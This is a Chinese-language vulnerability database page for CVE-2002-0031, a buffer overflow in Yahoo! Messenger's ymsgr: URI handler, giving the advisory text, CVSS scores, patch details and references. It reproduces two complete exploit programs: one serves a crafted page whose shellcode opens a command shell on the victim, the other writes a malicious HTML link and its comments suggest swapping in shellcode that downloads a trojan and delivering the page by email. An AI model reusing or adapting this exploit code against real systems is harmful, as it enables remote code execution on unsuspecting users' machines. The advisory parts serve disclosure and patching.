CVE-2002-0031
CVSS4.6
发布时间 :2002-07-26 00:00:00
修订时间 :2008-09-05 16:26:59
NMCOES    

[原文]Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.


[CNNVD]Yahoo! Messenger Call Center远程缓冲区溢出漏洞(CNNVD-200207-124)

        
        Yahoo! Messenger是一款即时聊天客户端。
        Yahoo! Messenger中的'Call Center'功能存在漏洞,可导致远程攻击者进行缓冲区溢出攻击。
        Yahoo! Messenger在安装时会配置'ymsgr:' URI句柄,在Win98系统下,注册表中为HKEY_LOCAL_MACHINE\Software\CLASSES\ymsgr\shell\open\command,默认值为"YPAGER.EXE %1". 此句柄调用接收'call'等参数的YPAGER.EXE来启用'Call Center'功能。
        任意由"ymsgr:"开头的URL就会由ypager.exe来执行,但在ymsgr协议中没有正确进行边界检查,攻击者可以构建包含恶意数据的YIM调用如:"call"、"sendim"、"getimv"、"chat"、"addview"、"addfriend"的Web页面,当yahoo messenger用户浏览此链接时,就可以导致messenger客户端产生缓冲区溢出,精心构建数据可导致以messenger进程的权限在客户端系统中执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0031
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0031
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-124
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2002-16.html
(VENDOR_ADVISORY)  CERT  CA-2002-16
http://www.kb.cert.org/vuls/id/137115
(UNKNOWN)  CERT-VN  VU#137115
http://www.securityfocus.com/bid/4837
(VENDOR_ADVISORY)  BID  4837
http://online.securityfocus.com/archive/1/274223
(VENDOR_ADVISORY)  BUGTRAQ  20020527 Yahoo Messenger - Multiple Vulnerabilities

- 漏洞信息

Yahoo! Messenger Call Center远程缓冲区溢出漏洞
中危 边界条件错误
2002-07-26 00:00:00 2005-10-20 00:00:00
远程  
        
        Yahoo! Messenger是一款即时聊天客户端。
        Yahoo! Messenger中的'Call Center'功能存在漏洞,可导致远程攻击者进行缓冲区溢出攻击。
        Yahoo! Messenger在安装时会配置'ymsgr:' URI句柄,在Win98系统下,注册表中为HKEY_LOCAL_MACHINE\Software\CLASSES\ymsgr\shell\open\command,默认值为"YPAGER.EXE %1". 此句柄调用接收'call'等参数的YPAGER.EXE来启用'Call Center'功能。
        任意由"ymsgr:"开头的URL就会由ypager.exe来执行,但在ymsgr协议中没有正确进行边界检查,攻击者可以构建包含恶意数据的YIM调用如:"call"、"sendim"、"getimv"、"chat"、"addview"、"addfriend"的Web页面,当yahoo messenger用户浏览此链接时,就可以导致messenger客户端产生缓冲区溢出,精心构建数据可导致以messenger进程的权限在客户端系统中执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Yahoo!
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        请使用messenger 5.0 build 1065版本:
        Yahoo! Messenger 5.0:
        Yahoo! Upgrade Messenger 5.0 Build 1065
        
        http://download.yahoo.com/dl/installs/ymsgr/ymsgr_1065.exe

- 漏洞信息 (45)

Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c) (EDBID:45)
windows remote
2003-06-23 Verified
80 Rave
N/A [点击下载]
/* 
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
* ^__________^ 
*
*
*/


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h> /* These are the usual header files */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */

static int port =80;

/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";

/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"

"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()



static int port;
void Usage(char *programName)
{
printf("\n\t\t---------------------------------------------------\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: rave@dtors.net\n");
printf("\t\t---------------------------------------------------\n\n");


/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t---------------------------------------------------\n\n");
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
printf("\t\t---------------------------------------------------\n\n");

}

/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;

for (i=1; i< argc;i++) {
if (argv[i][0] == '/' || argv[i][0] == '-') {
switch (argv[i][1]) {
/* An argument -? means help is requested */
case '?':
Usage(argv[0]);
break;
case 'P':
port=atoi(argv[i+1]);break;
case 'H':
if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}

int main(int argc,char *argv[])
{
FILE *fptr;
unsigned char buffer[5000];
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */

char sd[MAXDATASIZE]; /* sd will store send text */

struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */
struct hostent *he; /* pointer for the host entry */


WSADATA wsdata;
WSAStartup(0x0101,&wsdata);


if (argc == 1) {
/* If no arguments we call the Usage routine and exit */
Usage(argv[0]);
return 1;
}

HandleOptions(argc,argv);
fprintf(stdout,"Creating index.html: ");
if ((fptr =fopen("index.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

// memseting the buffers for preperation
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);


// whe place the a jmp ebp+0x3 instuction inside the buffer
// to jump over the eip changing bytes at the en offset
//
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
// |____________^
buffer[offset-4]=0xeb;
buffer[offset-3]=0x03;

memcpy(buffer+offset,sraddress,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));


// here whe make the index.html
// whe open it again if some one connects to the exploiting server
// and send it over to the victim.

fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html>
</body>\x00\x00\x00",0x22,0x22);

fclose(fptr); // <-- closing index.html again


// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);

if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}


server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
memset(server.sin_zero,0,8); /* zero the rest of the structure*/


if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
/* calls bind() */
printf("bind() error\n");
exit(-1);
}

if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}

while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
/* calls accept() */
printf("accept() error\n");
exit(1);
}

if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){
printf("gethostbyname() error\n");
exit(-1);
}

printf("You got a connection from %s (%s)\n",
inet_ntoa(client.sin_addr),he->h_name);
/* prints client's IP */


fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

fprintf(stdout,"Sending the overflow string... ");


// reading the index.html file and sending its
// contents to the connected victim

while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';


}


send(fd2,sd,strlen(sd),0);


printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name);

gets(sd);
exit(0);
}

return 0;
}


// milw0rm.com [2003-06-23]
		

- 漏洞信息 (21484)

Yahoo! Messenger 5.0 Call Center Buffer Overflow Vulnerability (EDBID:21484)
windows remote
2002-05-27 Verified
0 bob
N/A [点击下载]
source: http://www.securityfocus.com/bid/4837/info

Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.

There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.

Attackers may exploit this vulnerability to execute arbitrary code. 

/* Yahpoo.c by bob@dtors.net  [www.dtors.net] [DSR]
 *
 * Why Yahoo Messenger have not fixed this vulnerbility
 * I dont know...but either way they are stupid!
 * 
 * This exploit has been tested on:
 * Yahoo Messenger 5,5,0,1246
 * Yahoo Module 5,5,0,454
 * 
 * For:
 * Windows 2000 Professional 5.0.2195 SP3
 *
 * Rave@dtors.net has released a windows [exe] version of this
 * exploit but for Windows XP Pro SP1. 
 * So both targets are vulnerable XP/2k...some addresses might need changing.
 *
 * Problems that may occur:
 * 
 * The addresses used may vary from box to box..so they might need changing.
 * The stack may keep on changing the location of your shellcode address..you
 * need to hit a static sector that will not alternate. [this is the reason we jmp]
 * There exist two crashes...the first one we bypass..this is the access violation
 * when you hit the nop sled the first time round. The second crash is where we 
 * hit the nop sled...so dont get confused between the 2.
 *
 * The shellcode used here...will not do anything malicious..just opens a popup box
 * You can change this shellcode to something else...but the buffer is not very big
 * so there is no chance of a bind shell or anything.
 * Sloth from nopninjas.com has a shellcode that will download a trojan
 * and execute it. Nice and small as well ;)
 *
 * Thats about it...this exploit will lead to remote command execution on the
 * victim. Bare in mind this is triggered via bad URI handling...and the victim
 * needs to actually view the evil html file..this can be done automatically via
 * email >:)
 *
 * Big Lovin to rica.
 * Thanks to rave for his time.
 * Greetz:
 * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin,
 * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f.
 * special thanks to sloth@nopninjas
 *
 * 
 * bob@dtors.net www.dtors.net
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h> 
#define MessageBoxA "\x1d\x97\x53\x01"


char ret[8]= "\xD5\x96\x7A\x01";


unsigned char win32_msgbox[] = {
    "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA  "\x2D\x01\x01"
    "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
    "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
};	

int main(int argc,char *argv[])
{
 FILE *evil;
 char *shellcode = win32_msgbox;
 unsigned char buffer[5000];
 int offset=320;

                fprintf(stdout, "\n\tYahPoo.c By bob.\n");
	        fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
	        fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");

                fprintf(stdout,"Makin' da EbUL HTML File... ");
		if ((evil =fopen("yahoo.html","w"))==NULL){
			fprintf(stderr,"Failed\n");
			exit(1);
			} else {
			fprintf(stderr,"Opened!\n");
			}



	memset(buffer,0x00,offset+32+strlen(shellcode));
 	memset(buffer,0x90,offset);


	memcpy(buffer+offset,ret,4);
	memcpy(buffer+offset+4,shellcode,strlen(shellcode));

        buffer[264] = 0xD4;   //address of &shellcode
        buffer[265] = 0x96;
        buffer[266] = 0x7A;
        buffer[267] = 0x01;
        
        buffer[272] = 0xF5;   //jmp 0xc [msvcrt.dll]
	buffer[273] = 0x01;
	buffer[274] = 0x01;
	buffer[275] = 0x78;

	fprintf(evil,"<html>");
	fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
	fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
	fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
	fprintf(evil,"<pre>");
	fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22);
	fclose(evil); // <-- closing yahoo.html
	
	fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");

  } //end main


		

- 漏洞信息

16016
Yahoo! Messenger ymsgr: Protocol Multiple Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-05-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Yahoo! Messenger Call Center Buffer Overflow Vulnerability
Boundary Condition Error 4837
Yes No
2002-05-27 12:00:00 2009-07-11 01:56:00
Discovered by Phuong Nguyen <dphuong@yahoo.com>.

- 受影响的程序版本

Yahoo! Messenger 5.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Yahoo! Messenger 5.0 .1065

- 不受影响的程序版本

Yahoo! Messenger 5.0 .1065

- 漏洞讨论

Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.

There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.

Attackers may exploit this vulnerability to execute arbitrary code.

- 漏洞利用

The following proof of concept exploit has been supplied by Rave &lt;rave@dtors.net&gt;:

- 解决方案

Yahoo has reportedly eliminated this vulnerability in Build 1065. It has been reported that a bug in the distribution mechanism may have caused Build 1036 to be installed on systems rather than Build 1065. This would leave unsuspecting users vulnerable. Users are advised to ensure that they are using 5,0,0,1065 and install it if they are not:


Yahoo! Messenger 5.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站